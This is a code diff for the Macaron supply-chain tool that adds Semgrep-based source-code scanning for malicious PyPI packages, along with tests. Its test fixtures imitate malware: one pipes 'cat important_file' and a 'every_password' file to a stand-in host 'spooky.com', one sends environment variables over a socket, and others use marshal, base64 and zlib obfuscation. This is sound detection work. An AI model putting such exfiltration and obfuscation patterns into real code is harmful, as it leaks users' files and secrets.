self._should_skip(results, analyzer.depends_on): + return HeuristicResult.SKIP, {} + + try: + with pypi_package_json.sourcecode(): + return analyzer.analyze(pypi_package_json) + except SourceCodeError as error: + error_msg = f"Unable to perform analysis, source code not available: {error}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from error def evaluate_heuristic_results( self, heuristic_results: dict[Heuristics, HeuristicResult] @@ -281,6 +301,7 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: has_repository=ctx.component.repository is not None, pypi_registry=pypi_registry, package_json={}, + package_sourcecode_path="", ) pypi_registry_info.metadata.append(pypi_package_json) @@ -288,28 +309,39 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # Download the PyPI package JSON, but no need to persist it to the filesystem. if pypi_package_json.package_json or pypi_package_json.download(dest=""): try: - result, detail_info = self.run_heuristics(pypi_package_json) + heuristic_results, heuristics_detail_info = self.run_heuristics(pypi_package_json) except HeuristicAnalyzerValueError: return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) - confidence, triggered_rules = self.evaluate_heuristic_results(result) - detail_info["triggered_rules"] = triggered_rules + confidence, triggered_rules = self.evaluate_heuristic_results(heuristic_results) + heuristics_detail_info["triggered_rules"] = triggered_rules result_type = CheckResultType.FAILED if not confidence: confidence = Confidence.HIGH result_type = CheckResultType.PASSED - elif ctx.dynamic_data["validate_malware"]: - is_malware, validation_result = self.validate_malware(pypi_package_json) - if is_malware: # Find source code block matched the malicious pattern - confidence = Confidence.HIGH - elif validation_result: # Find suspicious source code, but cannot be confirmed - confidence = Confidence.MEDIUM - logger.debug(validation_result) + + # optional sourcecode analysis feature + if ctx.dynamic_data["analyze_source"]: + try: + sourcecode_result, sourcecode_detail_info = self.analyze_source( + pypi_package_json, heuristic_results, force=ctx.dynamic_data["force_analyze_source"] + ) + except (HeuristicAnalyzerValueError, ConfigurationError): + return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) + + heuristic_results[Heuristics.SUSPICIOUS_PATTERNS] = sourcecode_result + heuristics_detail_info.update(sourcecode_detail_info) + + if sourcecode_result == HeuristicResult.FAIL: + if result_type == CheckResultType.PASSED: + # heuristics determined it benign, so lower the confidence + confidence = Confidence.LOW + result_type = CheckResultType.FAILED result_tables.append( MaliciousMetadataFacts( - result=result, - detail_information=detail_info, + result=heuristic_results, + detail_information=heuristics_detail_info, confidence=confidence, ) ) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index b0b0275b5..2c6af515c 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -5,10 +5,13 @@ import logging import os +import re +import shutil import tarfile import tempfile import urllib.parse -import zipfile +from collections.abc import Callable, Generator, Iterator +from contextlib import contextmanager from dataclasses import dataclass from datetime import datetime @@ -17,7 +20,7 @@ from requests import RequestException from macaron.config.defaults import defaults -from macaron.errors import ConfigurationError, InvalidHTTPResponseError +from macaron.errors import ConfigurationError, InvalidHTTPResponseError, SourceCodeError from macaron.json_tools import json_extract from macaron.malware_analyzer.datetime_parser import parse_datetime from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry @@ -26,6 +29,10 @@ logger: logging.Logger = logging.getLogger(__name__) +def _handle_temp_dir_clean(function: Callable, path: str, onerror: tuple) -> None: + raise SourceCodeError(f"Error removing with shutil. function={function}, " f"path={path}, excinfo={onerror}") + + class PyPIRegistry(PackageRegistry): """This class implements the pypi package registry.""" @@ -159,77 +166,102 @@ def download_package_json(self, url: str) -> dict: return res_obj - def fetch_sourcecode(self, src_url: str) -> dict[str, str] | None: - """Get the source code of the package. + def download_package_sourcecode(self, url: str) -> str: + """Download the package source code from pypi registry. + + Parameters + ---------- + url: str + The package source code url. Returns ------- - str | None - The source code. + str + The temp directory with the source code. + + Raises + ------ + InvalidHTTPResponseError + If the HTTP request to the registry fails or an unexpected response is returned. """ # Get name of file. - _, _, file_name = src_url.rpartition("/") - - # Create a temporary directory to store the downloaded source. - with tempfile.TemporaryDirectory() as temp_dir: + _, _, file_name = url.rpartition("/") + package_name = re.sub(r"\.tar\.gz$", "", file_name) + + # temporary directory to unzip and read all source files + temp_dir = tempfile.mkdtemp(prefix=f"{package_name}_") + response = send_get_http_raw(url, stream=True) + if response is None: + error_msg = f"Unable to find package source code using URL: {url}" + logger.debug(error_msg) try: - response = requests.get(src_url, stream=True, timeout=40) - response.raise_for_status() - except requests.exceptions.HTTPError as http_err: - logger.debug("HTTP error occurred: %s", http_err) - return None + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception - if response.status_code != 200: - return None + raise InvalidHTTPResponseError(error_msg) - source_file = os.path.join(temp_dir, file_name) - with open(source_file, "wb") as file: - try: - for chunk in response.iter_content(): - file.write(chunk) - except RequestException as error: - # Something went wrong with the request, abort. - logger.debug("Error while streaming source file: %s", error) - response.close() - return None - logger.debug("Begin fetching the source code from PyPI") - py_files_content: dict[str, str] = {} - if tarfile.is_tarfile(source_file): + with tempfile.NamedTemporaryFile("+wb", delete=True) as source_file: + try: + for chunk in response.iter_content(): + source_file.write(chunk) + source_file.flush() + except RequestException as stream_error: + error_msg = f"Error while streaming source file: {stream_error}" + logger.debug(error_msg) try: - with tarfile.open(source_file, "r:gz") as tar: - for member in tar.getmembers(): - if member.isfile() and member.name.endswith(".py") and member.size > 0: - file_obj = tar.extractfile(member) - if file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[member.name] = content - except tarfile.ReadError as exception: - logger.debug("Error reading tar file: %s", exception) - return None - elif zipfile.is_zipfile(source_file): + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from RequestException + + if tarfile.is_tarfile(source_file.name): try: - with zipfile.ZipFile(source_file, "r") as zip_ref: - for info in zip_ref.infolist(): - if info.filename.endswith(".py") and not info.is_dir() and info.file_size > 0: - with zip_ref.open(info) as file_obj: - content = file_obj.read().decode("utf-8") - py_files_content[info.filename] = content - except zipfile.BadZipFile as bad_zip_exception: - logger.debug("Error reading zip file: %s", bad_zip_exception) - return None - except zipfile.LargeZipFile as large_zip_exception: - logger.debug("Zip file too large to read: %s", large_zip_exception) - return None - # except KeyError as zip_key_exception: - # logger.debug( - # "Error finding target '%s' in zip file '%s': %s", archive_target, source_file, zip_key_exception - # ) - # return None + with tarfile.open(source_file.name, "r:gz") as sourcecode_tar: + sourcecode_tar.extractall(temp_dir, filter="data") + + except tarfile.ReadError as read_error: + error_msg = f"Error reading source code tar file: {read_error}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + + raise InvalidHTTPResponseError(error_msg) from read_error + + extracted_dir = os.listdir(temp_dir) + if len(extracted_dir) == 1 and package_name == extracted_dir[0]: + # structure used package name and version as top-level directory + temp_dir = os.path.join(temp_dir, extracted_dir[0]) + else: - logger.debug("Unable to extract file: %s", file_name) + error_msg = f"Unable to extract source code from file {file_name}" + logger.debug(error_msg) + try: + shutil.rmtree(temp_dir, onerror=_handle_temp_dir_clean) + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {temp_dir} for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise InvalidHTTPResponseError(error_msg) from tempdir_exception + + raise InvalidHTTPResponseError(error_msg) - logger.debug("Successfully fetch the source code from PyPI") - return py_files_content + logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) + return temp_dir def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -389,6 +421,9 @@ class PyPIPackageJsonAsset: #: The asset content. package_json: dict + #: the source code temporary location name + package_sourcecode_path: str + #: The size of the asset (in bytes). This attribute is added to match the AssetLocator #: protocol and is not used because pypi API registry does not provide it. @property @@ -518,16 +553,120 @@ def get_latest_release_upload_time(self) -> str | None: return upload_time return None - def get_sourcecode(self) -> dict[str, str] | None: - """Get source code of the package. + @contextmanager + def sourcecode(self) -> Generator[None]: + """Download and cleanup source code of the package with a context manager.""" + if not self.download_sourcecode(): + raise SourceCodeError("Unable to download package source code.") + yield + self.cleanup_sourcecode() + + def download_sourcecode(self) -> bool: + """Get the source code of the package and store it in a temporary directory. Returns ------- - dict[str, str] | None - The source code of each script in the package + bool + ``True`` if the source code is downloaded successfully; ``False`` if not. """ - url: str | None = self.get_sourcecode_url() + url = self.get_sourcecode_url() if url: - source_code: dict[str, str] | None = self.pypi_registry.fetch_sourcecode(url) - return source_code - return None + try: + self.package_sourcecode_path = self.pypi_registry.download_package_sourcecode(url) + return True + except InvalidHTTPResponseError as error: + logger.debug(error) + return False + + def cleanup_sourcecode(self) -> None: + """ + Delete the temporary directory created when downloading the source code. + + The package source code is no longer accessible after this, and the package_sourcecode_path + attribute is set to an empty string. + """ + if self.package_sourcecode_path: + try: + shutil.rmtree(self.package_sourcecode_path, onerror=_handle_temp_dir_clean) + self.package_sourcecode_path = "" + except SourceCodeError as tempdir_exception: + tempdir_exception_msg = ( + f"Unable to cleanup temporary directory {self.package_sourcecode_path}" + f" for source code: {tempdir_exception}" + ) + logger.debug(tempdir_exception_msg) + raise tempdir_exception + + def get_sourcecode_file_contents(self, path: str) -> bytes: + """ + Get the contents of a single source code file specified by the path. + + The path can be relative to the package_sourcecode_path attribute, or an absolute path. + + Parameters + ---------- + path: str + The absolute or relative to package_sourcecode_path file path to open. + + Returns + ------- + bytes + The raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded, or there is an error accessing the file. + """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + if not os.path.isabs(path): + path = os.path.join(self.package_sourcecode_path, path) + + if not os.path.exists(path): + error_msg = f"Unable to locate file {path}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + try: + with open(path, "rb") as file: + return file.read() + except OSError as read_error: + error_msg = f"Unable to read file {path}: {read_error}" + logger.debug(error_msg) + raise SourceCodeError(error_msg) from read_error + + def iter_sourcecode(self) -> Iterator[tuple[str, bytes]]: + """ + Iterate through all source code files. + + Returns + ------- + tuple[str, bytes] + The source code file path, and the the raw contents of the source code file. + + Raises + ------ + SourceCodeError + if the source code has not been downloaded. + """ + if not self.package_sourcecode_path: + error_msg = "No source code files have been downloaded" + logger.debug(error_msg) + raise SourceCodeError(error_msg) + + for root, _directories, files in os.walk(self.package_sourcecode_path): + for file in files: + if root == ".": + root_path = os.getcwd() + os.linesep + else: + root_path = root + filepath = os.path.join(root_path, file) + + with open(filepath, "rb") as handle: + contents = handle.read() + + yield filepath, contents diff --git a/src/macaron/util.py b/src/macaron/util.py index d037ead10..96af86991 100644 --- a/src/macaron/util.py +++ b/src/macaron/util.py @@ -131,6 +131,7 @@ def send_get_http_raw( timeout: int | None = None, allow_redirects: bool = True, check_response_fails: bool = True, + stream: bool = False, ) -> Response | None: """Send the GET HTTP request with the given url and headers. @@ -148,6 +149,8 @@ def send_get_http_raw( Whether to allow redirects. Default: True. check_response_fails: bool When True, check if the response fails. Otherwise, return the response. + stream: bool + Indicates whether the response should be immediately downloaded (False) or streamed (True). Default: False. Returns ------- @@ -164,10 +167,7 @@ def send_get_http_raw( retry_counter = error_retries try: response = requests.get( - url=url, - headers=headers, - timeout=timeout, - allow_redirects=allow_redirects, + url=url, headers=headers, timeout=timeout, allow_redirects=allow_redirects, stream=stream ) except requests.exceptions.RequestException as error: logger.debug(error) diff --git a/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/check_sourcecode_patterns.sh b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/check_sourcecode_patterns.sh new file mode 100755 index 000000000..fa2d73d3b --- /dev/null +++ b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/check_sourcecode_patterns.sh @@ -0,0 +1,14 @@ +#!/bin/bash +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. +result=$(sqlite3 --json output/macaron.db "SELECT detect_malicious_metadata_check.result + FROM detect_malicious_metadata_check JOIN check_facts on detect_malicious_metadata_check.id = check_facts.id + JOIN check_result on check_facts.check_result_id = check_result.id JOIN component + ON component.id = check_result.component_id WHERE check_result.check_id = 'mcn_detect_malicious_metadata_1' + AND component.name = 'django' AND component.version = '5.0.6';" | jq -r ".[0].result | fromjson | .suspicious_patterns") + +if [ "$result" != "PASS" ]; then + echo "ERROR: suspicious_patterns heuristic result $result is not PASS" >&2 + exit 1 +fi +exit 0 diff --git a/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/policy-sourcecode.dl b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/policy-sourcecode.dl new file mode 100644 index 000000000..f6aec96ac --- /dev/null +++ b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/policy-sourcecode.dl @@ -0,0 +1,10 @@ +/* Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("check_sourcecode_malware_analysis", component_id, "Checks malware analysis with sourcecode analysis.") :- + check_passed(component_id, "mcn_detect_malicious_metadata_1"). + +apply_policy_to("check_sourcecode_malware_analysis", component_id) :- + is_component(component_id, "pkg:pypi/django@5.0.6"). diff --git a/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/test.yaml b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/test.yaml index ddc7a4abb..4d2836188 100644 --- a/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/test.yaml +++ b/tests/integration/cases/django_with_dep_resolution_virtual_env_as_input/test.yaml @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. description: | @@ -66,6 +66,29 @@ steps: kind: verify options: policy: policy-all-pypi.dl +# optional Semgrep sourcecode analysis +- name: Clean up the database. + kind: shell + options: + cmd: rm -f output/macaron.db +- name: Run macaron analyze with forced sourcecode analysis + kind: analyze + options: + command_args: + - -purl + - pkg:pypi/django@5.0.6 + - --python-venv + - ./django_venv + - --analyze-source + - --force-analyze-source +- name: Run macaron verify-policy to check the package was not marked as malicious. + kind: verify + options: + policy: policy-sourcecode.dl +- name: Query the output database to verify the suspicious_patterns rull passed. + kind: shell + options: + cmd: ./check_sourcecode_patterns.sh - name: Clean up the virtual environment. kind: shell options: diff --git a/tests/malware_analyzer/pypi/resources/custom_sample.yaml b/tests/malware_analyzer/pypi/resources/custom_sample.yaml new file mode 100644 index 000000000..04603d2de --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/custom_sample.yaml @@ -0,0 +1,23 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +# This is a sample file designed to ensure the functionality for providing +# custom Semgrep rules works as expected + +rules: +- id: custom_sample_1 + metadata: + description: Detects the statement for disabling exports + message: Detected disabling of exports + languages: + - python + severity: ERROR + pattern: __all__ = [] +- id: custom_sample_2 + metadata: + description: Detects sys.exit() + message: Detected sys.exit() + languages: + - python + severity: ERROR + pattern: sys.exit() diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json new file mode 100644 index 000000000..ef19d6c0e --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json @@ -0,0 +1,25 @@ +{ + "enabled_sourcecode_rule_findings": { + "src.macaron.resources.pypi_malware_rules.exfiltration_remote-exfiltration": { + "message": "Detected exfiltration of sensitive data to a remote endpoint", + "detections": [ + { + "file": "exfiltration/remote_exfiltration.py", + "start": 31, + "end": 31 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 42, + "end": 42 + }, + { + "file": "exfiltration/remote_exfiltration.py", + "start": 50, + "end": 50 + } + ] + } + }, + "disabled_sourcecode_rule_findings": {} +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py new file mode 100644 index 000000000..e2602ef1f --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote_exfiltration.py @@ -0,0 +1,50 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. + + def os_to_requests(): + import os + + import requests + with os.popen("cat important_file") as pipe: + requests.post("spooky.com", data=pipe.read()) + + def file_exfil_to_urllib3(): + import os as oo + + import urllib3 as uuu + op = oo.O_RDWR + do_it = oo.open + file = do_it("every_password", op) + man = uuu.PoolManager + http = man().request + http('POST', "spooky.com", body=oo.read(file, 2048)) + + def environ_to_socket(): # nosemgrep + import socket as s # nosemsemgrep + from os import environ as environment_vars # nosemgrep + with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: # nosemgrep + soc.connect(('localhost', 0)) # nosemgrep + other = soc # nosemgrep + other.send(environment_vars) # nosemgrep diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py new file mode 100644 index 000000000..114072a52 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py @@ -0,0 +1,67 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. + + # marshal encryption from pyobfuscate.com/marshal-encrypt, script is just print("Hello world!") + def marshal_flow(): + from marshal import loads + bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') + exec(bytecode) + + def marshal_inline_flow(): + exec(__import__('marshal').loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00')) + + def bytes_eval_to_soc_bind(): + import socket + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as soc: + soc.bind(__import__('builtins').eval(b'("127.0.0.1", 0)'.decode())) + + def map_b64_to_request(): + import requests as req + + # decodes to GET + method = __import__('base64').b64decode(b'R0VU') + # just maps to a random fake link https://www.print-hello-world-sample.com/print/hello/world! + link = ''.join(map(chr, [104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 112, 114, 105, 110, 116, 45, 104, 101, 108, 108, 111, 45, 119, 111, 114, 108, 100, 45, 115, 97, 109, 112, 108, 101, 46, 99, 111, 109, 47, 112, 114, 105, 110, 116, 47, 104, 101, 108, 108, 111, 47, 119, 111, 114, 108, 100, 33])) + _ = req.Request(method, link) + + def zlib_ast_subprocess(): + import subprocess + import zlib as zeeee + from ast import literal_eval + + # just decodes to ["echo", "Hello world!"] + subprocess.Popen(literal_eval(zeeee.decompress(b'x\x9c\x8bVOM\xce\xc8W\xd7QP\xf7H\xcd\xc9\xc9W(\xcf/\xcaIQT\x8f\x05\x00]\xa0\x07\x9d').decode())) + + def propagation_to_write(): + import os as e + + # symbol propagations should detect assign of os as e to o and bytes to b and still trigger + o = e + b = bytes + # just decodes to "Hello world!" + contents = b.fromhex("48656C6C6F20776F726C6421") + # just decodes to "some_path" + file = o.open(''.join(chr(c) for c in [115, 111, 109, 101, 95, 112, 97, 116, 104]), o.O_RDWR) + o.pwritev(file, contents, 0) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json new file mode 100644 index 000000000..aabf72e18 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -0,0 +1,235 @@ +{ + "enabled_sourcecode_rule_findings": { + "src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute": { + "message": "Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 30, + "end": 30 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 67, + "end": 67 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_inline-imports": { + "message": "Found an instance of a suspicious API in a hardcoded inline import", + "detections": [ + { + "file": "obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "obfuscation/decode_and_execute.py", + "start": 44, + "end": 44 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 24, + "end": 24 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 29, + "end": 29 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 31, + "end": 31 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 32, + "end": 32 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 69, + "end": 69 + } + ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_obfuscation-tools": { + "message": "Found an indicator of the use of a python code obfuscation tool", + "detections": [ + { + "file": "obfuscation/obfuscation_tools.py", + "start": 23, + "end": 23 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 25, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 26, + "end": 26 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 27, + "end": 27 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 28, + "end": 28 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 30, + "end": 31 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 33, + "end": 33 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 37, + "end": 37 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 39, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 40, + "end": 40 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 41, + "end": 41 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 42, + "end": 42 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 44, + "end": 45 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 47, + "end": 47 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 51, + "end": 51 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 53, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 54, + "end": 54 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 55, + "end": 55 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 56, + "end": 56 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 58, + "end": 59 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 61, + "end": 61 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 65, + "end": 65 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + }, + { + "file": "obfuscation/obfuscation_tools.py", + "start": 68, + "end": 68 + } + ] + } + }, + "disabled_sourcecode_rule_findings": {} +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py new file mode 100644 index 000000000..80e006781 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py @@ -0,0 +1,32 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + __import__('base64') + __import__('builtins') + __import__('subprocess') + __import__('sys') + __import__('os') + __import__('zlib') + __import__('marshal') + # these both just import builtins + __import__('\142\165\151\154\164\151\156\163') + __import__('\x62\x75\x69\x6c\x74\x69\x6e\x73') diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py new file mode 100644 index 000000000..270f88600 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/obfuscation_tools.py @@ -0,0 +1,69 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + # using pyobfuscate.com/rename-obf to rename items, code is a class that has one method that prints Hello world! + lllllllllllllll, llllllllllllllI = __name__, print + + class lIIlIIIIIIIlIlllIl: + IIlIllIIlllIlIlIll = 'Hello' + IlIIlIIIlIllIIlIIl = 'world' + IIlIlIlIIIIlIIlIlI = '!' + + def IIlIlIIIIlIlIlIIll(IIIlIlIIllllIlIlll): + llllllllllllllI(f'{IIIlIlIIllllIlIlll.IIlIllIIlllIlIlIll} {IIIlIlIIllllIlIlll.IlIIlIIIlIllIIlIIl}{IIIlIlIIllllIlIlll.IIlIlIlIIIIlIIlIlI}') + if lllllllllllllll == '__main__': + llIlIIIllIIIIlIlll = lIIlIIIIIIIlIlllIl() + llIlIIIllIIIIlIlll.IIlIlIIIIlIlIlIIll() + + # using using pyob.oxyry.com's naming convention + __O0O00O00O0OOOOO0O, __OO00000OOOO000OO0 = __name__, print + + class OO0OO0OOO0OOOO000: + OO000OOOOO00O0OOO = 'Hello' + OOO0O00O00000O0O0 = 'world' + OOOOO0O000O0O000O = '!' + + def OOOOOO000OOO0O0O0(O00O00O0O00O000O0): + __OO00000OOOO000OO0(f'{O00O00O0O00O000O0.OO000OOOOO00O0OOO} {O00O00O0O00O000O0.OOO0O00O00000O0O0}{O00O00O0O00O000O0.OOOOO0O000O0O000O}') + if __O0O00O00O0OOOOO0O == '__main__': + __OO00000O00OOOO0OO = OO0OO0OOO0OOOO000() + 